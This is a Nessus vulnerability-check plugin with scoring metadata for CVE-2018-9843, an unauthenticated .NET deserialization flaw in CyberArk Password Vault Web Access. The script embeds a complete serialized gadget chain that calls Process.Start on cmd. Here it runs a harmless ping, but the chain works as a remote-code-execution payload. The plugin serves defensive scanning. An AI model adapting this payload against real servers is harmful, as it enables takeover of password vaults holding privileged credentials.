nessus - This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. - CYBERARK_PVWA_CVE-2018-9843.NASL
History: Jun 01, 2018 - 12:00 a.m.

CyberArk Password Vault Web Access .NET Object Deserialization (Direct Check)

2018-06-01 00:00:00
This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
586

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS

0.715

Percentile

98.1%

The CyberArk Password Vault Web Access running on the remote host is affected by a remote code execution vulnerability due to unsafe deserialization of a .NET object. An unauthenticated, remote attacker can exploit this, via a crafted .NET object, to execute arbitrary .NET code in the context of the IIS server.

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

# Registration pass: when the engine loads the plugin with `description` set,
# only this block runs. It records the plugin's metadata (identifiers, text,
# scoring, scheduling requirements) and exits before any of the detection code
# further down is reached.
if (description)
{
  script_id(110287);
  script_version("1.5");
  script_cvs_date("Date: 2019/10/07 15:15:27");

  # Vulnerability identifiers this check reports against.
  script_cve_id("CVE-2018-9843");
  script_bugtraq_id(105180);

  script_name(english:"CyberArk Password Vault Web Access .NET Object Deserialization (Direct Check)");
  script_summary(english:"Sends a .NET object to trigger an error message.");

  # Report text shown to the person reading the scan results.
  script_set_attribute(attribute:"synopsis", value:
"An Identity Management application running on the remote host is affected by
a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The CyberArk Password Vault Web Access running on the remote host is
affected by a remote code execution vulnerability due to unsafe
deserialization of an .NET object. An unauthenticated, remote
attacker can exploit this, via a crafted a .NET object, to execute
arbitrary .NET code in the context of the IIS server.");

  # https://www.redteam-pentesting.de/en/advisories/rt-sa-2017-014/-cyberark-password-vault-web-access-remote-code-execution
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?e1d84c64");
  # Remediation: the fixed releases named by the plugin.
  script_set_attribute(attribute:"solution", value:
"Upgrade to CyberArk Password Vault Web Access 9.9.5, 9.10.1, 10.2 or Later.");
  # Base vectors: network-reachable, low complexity, no authentication needed.
  # Temporal vectors: proof-of-concept exploit code, official fix, confirmed.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-9843");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  # The recorded patch date (2018/02/28) is earlier than the recorded
  # vulnerability publication date (2018/04/09).
  script_set_attribute(attribute:"vuln_publication_date", value:"2018/04/09");
  script_set_attribute(attribute:"patch_publication_date", value:"2018/02/28");
  script_set_attribute(attribute:"plugin_publication_date", value:"2018/06/01");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:cyberark:password_vault");
  script_end_attributes();

  # NOTE(review): the detection code sends a serialized object that, on a
  # vulnerable host, appears to start a short-lived `ping` through cmd. Confirm
  # that ACT_GATHER_INFO is the intended category for a check with that side
  # effect, and that scan operators are told about it.
  script_category(ACT_GATHER_INFO);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  # Scheduling: run after the detection plugin, and only when it recorded an
  # install of the application in the knowledge base.
  script_dependencies("cyberark_password_vault_detection.nbin");
  script_require_keys("installed_sw/CyberArk Password Vault Web Access");
  script_require_ports("Services/www", 80, 443);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");

# Product name under which the detection plugin registers installs; it is also
# used in the audit messages.
app = 'CyberArk Password Vault Web Access';

# Web service endpoint that receives the probe.
# NOTE(review): NASL double-quoted strings presumably keep the backslash
# literally, so the Location parameter is sent as a single backslash - confirm.
url = "/PasswordVault/WebServices/PIMServices.svc/Applications/?Location=\&IncludeSublocations=true";

# Argument string embedded in the probe object. It is a short, self-limiting
# ping of the target's own loopback address, so a vulnerable host sees a brief
# child process rather than any change to its data.
cmd = '/c ' + 'ping -n 3 localhost';

# Stop here unless the detection plugin found the application on this host.
get_install_count(app_name:app, exit_if_zero:TRUE);

# Select the web port and the install registered on it. An undetermined
# version is accepted because the check below does not depend on it.
port = get_http_port(default:80);
install = get_single_install(app_name:app, port:port, exit_if_unknown_ver:FALSE);

# Probe object sent to the server: two fixed byte runs with the `cmd` string
# spliced in between them, preceded by a length field built from strlen(cmd).
#
# The bytes start with what looks like the .NET binary-serialization stream
# header, and the ASCII embedded in them names the types involved:
# System.Collections.Generic.SortedSet`1[System.String], a
# ComparisonComparer`1, System.DelegateSerializationHolder, and the method
# System.Diagnostics.Process Start(System.String, System.String), with the
# literal "cmd" stored as one of the two strings.
#
# NOTE(review): on a vulnerable server, deserializing this graph appears to
# start cmd with the arguments held in `cmd`, so the probe is not free of
# side effects. During scan windows, defenders should expect that child
# process under the web application's identity on affected hosts - confirm.
# The byte values must stay exactly as they are; the object is only valid as
# a whole.
obj = raw_string(
0x00,0x01,0x00,0x00,0x00,0xFF,0xFF,0xFF,0xFF,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x0C,0x02,0x00,0x00,0x00,0x49,0x53,0x79,0x73,0x74,0x65,0x6D,0x2C,0x20,0x56,
0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,
0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,
0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,
0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,
0x05,0x01,0x00,0x00,0x00,0x84,0x01,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x43,0x6F,
0x6C,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x73,0x2E,0x47,0x65,0x6E,0x65,0x72,0x69,
0x63,0x2E,0x53,0x6F,0x72,0x74,0x65,0x64,0x53,0x65,0x74,0x60,0x31,0x5B,0x5B,0x53,
0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x6D,0x73,
0x63,0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,
0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,
0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,
0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,
0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x5D,0x04,0x00,0x00,0x00,0x05,
0x43,0x6F,0x75,0x6E,0x74,0x08,0x43,0x6F,0x6D,0x70,0x61,0x72,0x65,0x72,0x07,0x56,
0x65,0x72,0x73,0x69,0x6F,0x6E,0x05,0x49,0x74,0x65,0x6D,0x73,0x00,0x03,0x00,0x06,
0x08,0x8D,0x01,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x43,0x6F,0x6C,0x6C,0x65,0x63,
0x74,0x69,0x6F,0x6E,0x73,0x2E,0x47,0x65,0x6E,0x65,0x72,0x69,0x63,0x2E,0x43,0x6F,
0x6D,0x70,0x61,0x72,0x69,0x73,0x6F,0x6E,0x43,0x6F,0x6D,0x70,0x61,0x72,0x65,0x72,
0x60,0x31,0x5B,0x5B,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,
0x67,0x2C,0x20,0x6D,0x73,0x63,0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,
0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,
0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,
0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,
0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x5D,
0x08,0x02,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x09,0x03,0x00,0x00,0x00,0x02,0x00,
0x00,0x00,0x09,0x04,0x00,0x00,0x00,0x04,0x03,0x00,0x00,0x00,0x8D,0x01,0x53,0x79,
0x73,0x74,0x65,0x6D,0x2E,0x43,0x6F,0x6C,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x73,
0x2E,0x47,0x65,0x6E,0x65,0x72,0x69,0x63,0x2E,0x43,0x6F,0x6D,0x70,0x61,0x72,0x69,
0x73,0x6F,0x6E,0x43,0x6F,0x6D,0x70,0x61,0x72,0x65,0x72,0x60,0x31,0x5B,0x5B,0x53,
0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x6D,0x73,
0x63,0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,
0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,
0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,
0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,
0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x5D,0x01,0x00,0x00,0x00,0x0B,
0x5F,0x63,0x6F,0x6D,0x70,0x61,0x72,0x69,0x73,0x6F,0x6E,0x03,0x22,0x53,0x79,0x73,
0x74,0x65,0x6D,0x2E,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,0x72,0x69,
0x61,0x6C,0x69,0x7A,0x61,0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x09,
0x05,0x00,0x00,0x00,0x11,0x04,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x06,0x06,0x00,
0x00) +
mkword(strlen(cmd)) + cmd +
raw_string(
0x06,0x07,0x00,0x00,0x00,0x03,0x63,0x6D,
0x64,0x04,0x05,0x00,0x00,0x00,0x22,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x44,0x65,
0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,0x74,
0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x03,0x00,0x00,0x00,0x08,0x44,0x65,
0x6C,0x65,0x67,0x61,0x74,0x65,0x07,0x6D,0x65,0x74,0x68,0x6F,0x64,0x30,0x07,0x6D,
0x65,0x74,0x68,0x6F,0x64,0x31,0x03,0x03,0x03,0x30,0x53,0x79,0x73,0x74,0x65,0x6D,
0x2E,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,
0x7A,0x61,0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x2B,0x44,0x65,0x6C,
0x65,0x67,0x61,0x74,0x65,0x45,0x6E,0x74,0x72,0x79,0x2F,0x53,0x79,0x73,0x74,0x65,
0x6D,0x2E,0x52,0x65,0x66,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x2E,0x4D,0x65,0x6D,
0x62,0x65,0x72,0x49,0x6E,0x66,0x6F,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,
0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x2F,0x53,0x79,0x73,0x74,0x65,
0x6D,0x2E,0x52,0x65,0x66,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x2E,0x4D,0x65,0x6D,
0x62,0x65,0x72,0x49,0x6E,0x66,0x6F,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,
0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x09,0x08,0x00,0x00,0x00,0x09,
0x09,0x00,0x00,0x00,0x09,0x0A,0x00,0x00,0x00,0x04,0x08,0x00,0x00,0x00,0x30,0x53,
0x79,0x73,0x74,0x65,0x6D,0x2E,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,
0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,
0x72,0x2B,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x45,0x6E,0x74,0x72,0x79,0x07,
0x00,0x00,0x00,0x04,0x74,0x79,0x70,0x65,0x08,0x61,0x73,0x73,0x65,0x6D,0x62,0x6C,
0x79,0x06,0x74,0x61,0x72,0x67,0x65,0x74,0x12,0x74,0x61,0x72,0x67,0x65,0x74,0x54,
0x79,0x70,0x65,0x41,0x73,0x73,0x65,0x6D,0x62,0x6C,0x79,0x0E,0x74,0x61,0x72,0x67,
0x65,0x74,0x54,0x79,0x70,0x65,0x4E,0x61,0x6D,0x65,0x0A,0x6D,0x65,0x74,0x68,0x6F,
0x64,0x4E,0x61,0x6D,0x65,0x0D,0x64,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x45,0x6E,
0x74,0x72,0x79,0x01,0x01,0x02,0x01,0x01,0x01,0x03,0x30,0x53,0x79,0x73,0x74,0x65,
0x6D,0x2E,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,0x72,0x69,0x61,0x6C,
0x69,0x7A,0x61,0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x2B,0x44,0x65,
0x6C,0x65,0x67,0x61,0x74,0x65,0x45,0x6E,0x74,0x72,0x79,0x06,0x0B,0x00,0x00,0x00,
0xB0,0x02,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x46,0x75,0x6E,0x63,0x60,0x33,0x5B,
0x5B,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,
0x6D,0x73,0x63,0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,
0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,
0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,
0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,
0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x2C,0x5B,0x53,0x79,
0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x6D,0x73,0x63,
0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,
0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,
0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,
0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,
0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x2C,0x5B,0x53,0x79,0x73,0x74,0x65,
0x6D,0x2E,0x44,0x69,0x61,0x67,0x6E,0x6F,0x73,0x74,0x69,0x63,0x73,0x2E,0x50,0x72,
0x6F,0x63,0x65,0x73,0x73,0x2C,0x20,0x53,0x79,0x73,0x74,0x65,0x6D,0x2C,0x20,0x56,
0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,
0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,
0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,
0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,
0x5D,0x5D,0x06,0x0C,0x00,0x00,0x00,0x4B,0x6D,0x73,0x63,0x6F,0x72,0x6C,0x69,0x62,
0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,
0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,
0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,
0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,
0x30,0x38,0x39,0x0A,0x06,0x0D,0x00,0x00,0x00,0x49,0x53,0x79,0x73,0x74,0x65,0x6D,
0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,
0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,
0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,
0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,
0x30,0x38,0x39,0x06,0x0E,0x00,0x00,0x00,0x1A,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,
0x44,0x69,0x61,0x67,0x6E,0x6F,0x73,0x74,0x69,0x63,0x73,0x2E,0x50,0x72,0x6F,0x63,
0x65,0x73,0x73,0x06,0x0F,0x00,0x00,0x00,0x05,0x53,0x74,0x61,0x72,0x74,0x09,0x10,
0x00,0x00,0x00,0x04,0x09,0x00,0x00,0x00,0x2F,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,
0x52,0x65,0x66,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x2E,0x4D,0x65,0x6D,0x62,0x65,
0x72,0x49,0x6E,0x66,0x6F,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,0x74,0x69,
0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x07,0x00,0x00,0x00,0x04,0x4E,0x61,0x6D,
0x65,0x0C,0x41,0x73,0x73,0x65,0x6D,0x62,0x6C,0x79,0x4E,0x61,0x6D,0x65,0x09,0x43,
0x6C,0x61,0x73,0x73,0x4E,0x61,0x6D,0x65,0x09,0x53,0x69,0x67,0x6E,0x61,0x74,0x75,
0x72,0x65,0x0A,0x53,0x69,0x67,0x6E,0x61,0x74,0x75,0x72,0x65,0x32,0x0A,0x4D,0x65,
0x6D,0x62,0x65,0x72,0x54,0x79,0x70,0x65,0x10,0x47,0x65,0x6E,0x65,0x72,0x69,0x63,
0x41,0x72,0x67,0x75,0x6D,0x65,0x6E,0x74,0x73,0x01,0x01,0x01,0x01,0x01,0x00,0x03,
0x08,0x0D,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x54,0x79,0x70,0x65,0x5B,0x5D,0x09,
0x0F,0x00,0x00,0x00,0x09,0x0D,0x00,0x00,0x00,0x09,0x0E,0x00,0x00,0x00,0x06,0x14,
0x00,0x00,0x00,0x3E,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x44,0x69,0x61,0x67,0x6E,
0x6F,0x73,0x74,0x69,0x63,0x73,0x2E,0x50,0x72,0x6F,0x63,0x65,0x73,0x73,0x20,0x53,
0x74,0x61,0x72,0x74,0x28,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,
0x6E,0x67,0x2C,0x20,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,
0x67,0x29,0x06,0x15,0x00,0x00,0x00,0x3E,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x44,
0x69,0x61,0x67,0x6E,0x6F,0x73,0x74,0x69,0x63,0x73,0x2E,0x50,0x72,0x6F,0x63,0x65,
0x73,0x73,0x20,0x53,0x74,0x61,0x72,0x74,0x28,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,
0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,
0x74,0x72,0x69,0x6E,0x67,0x29,0x08,0x00,0x00,0x00,0x0A,0x01,0x0A,0x00,0x00,0x00,
0x09,0x00,0x00,0x00,0x06,0x16,0x00,0x00,0x00,0x07,0x43,0x6F,0x6D,0x70,0x61,0x72,
0x65,0x09,0x0C,0x00,0x00,0x00,0x06,0x18,0x00,0x00,0x00,0x0D,0x53,0x79,0x73,0x74,
0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x06,0x19,0x00,0x00,0x00,0x2B,0x49,
0x6E,0x74,0x33,0x32,0x20,0x43,0x6F,0x6D,0x70,0x61,0x72,0x65,0x28,0x53,0x79,0x73,
0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x53,0x79,0x73,0x74,
0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x29,0x06,0x1A,0x00,0x00,0x00,0x32,
0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x49,0x6E,0x74,0x33,0x32,0x20,0x43,0x6F,0x6D,
0x70,0x61,0x72,0x65,0x28,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,
0x6E,0x67,0x2C,0x20,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,
0x67,0x29,0x08,0x00,0x00,0x00,0x0A,0x01,0x10,0x00,0x00,0x00,0x08,0x00,0x00,0x00,
0x06,0x1B,0x00,0x00,0x00,0x71,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x43,0x6F,0x6D,
0x70,0x61,0x72,0x69,0x73,0x6F,0x6E,0x60,0x31,0x5B,0x5B,0x53,0x79,0x73,0x74,0x65,
0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x6D,0x73,0x63,0x6F,0x72,0x6C,
0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,
0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,
0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,
0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,
0x34,0x65,0x30,0x38,0x39,0x5D,0x5D,0x09,0x0C,0x00,0x00,0x00,0x0A,0x09,0x0C,0x00,
0x00,0x00,0x09,0x18,0x00,0x00,0x00,0x09,0x16,0x00,0x00,0x00,0x0A,0x0B
); 

# The application can take a while to answer, so allow a generous read timeout.
http_set_read_timeout(30);

# The probe object is base64-encoded and carried as the value of the
# 'authorization' request header of a single GET request.
auth_hdr = make_array('authorization', base64(str:obj));
resp = http_send_recv3(
         method      : 'GET',
         port        : port,
         item        : url,
         content_type: 'application/json',
         add_headers : auth_hdr,
         fetch404    : TRUE,
         exit_on_fail: TRUE
       );

# Element 2 of the result is the response body; without one there is nothing
# to inspect.
body = resp[2];
if (isnull(body))
{
  audit(AUDIT_RESP_NOT, port, 'a GET request: No data in the response body');
}

# Expected answers (both HTTP 403):
#
#   Patched:
#     {"ErrorCode":"CAWS00001E","ErrorMessage":"Connection to the Vault was terminated."}
#
#   Vulnerable:
#     {"ErrorCode":"CAWS00001E","ErrorMessage":"Error raised while trying to establish session using session token provided. Error: Unable to cast object of type 'System.Collections.Generic.SortedSet`1[System.String]' to type 'CyberArk.Services.Web.SessionIdentifiers'."}
#
# The cast error shows that the submitted object was deserialized before the
# server checked its type, so only that message counts as evidence.
# NOTE(review): a negative result means only that this error text was absent.
# An intermediary that rewrites error bodies could hide it, so the installed
# version should still be compared with the fixed releases - confirm.
if (body !~ "Unable to cast object of type.* to type 'CyberArk.Services.Web.SessionIdentifiers")
  audit(AUDIT_INST_VER_NOT_VULN, app, install['version']);

# Reaching this point means the cast error was returned: report the finding.
security_report_v4(
  port     : port,
  severity : SECURITY_HOLE,
  extra    :
    '\nNessus was able to detect the .NET deserialization vulnerability by' +
    '\nsending a crafted .NET object.' +
    '\n'
);

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS

0.715

Percentile

98.1%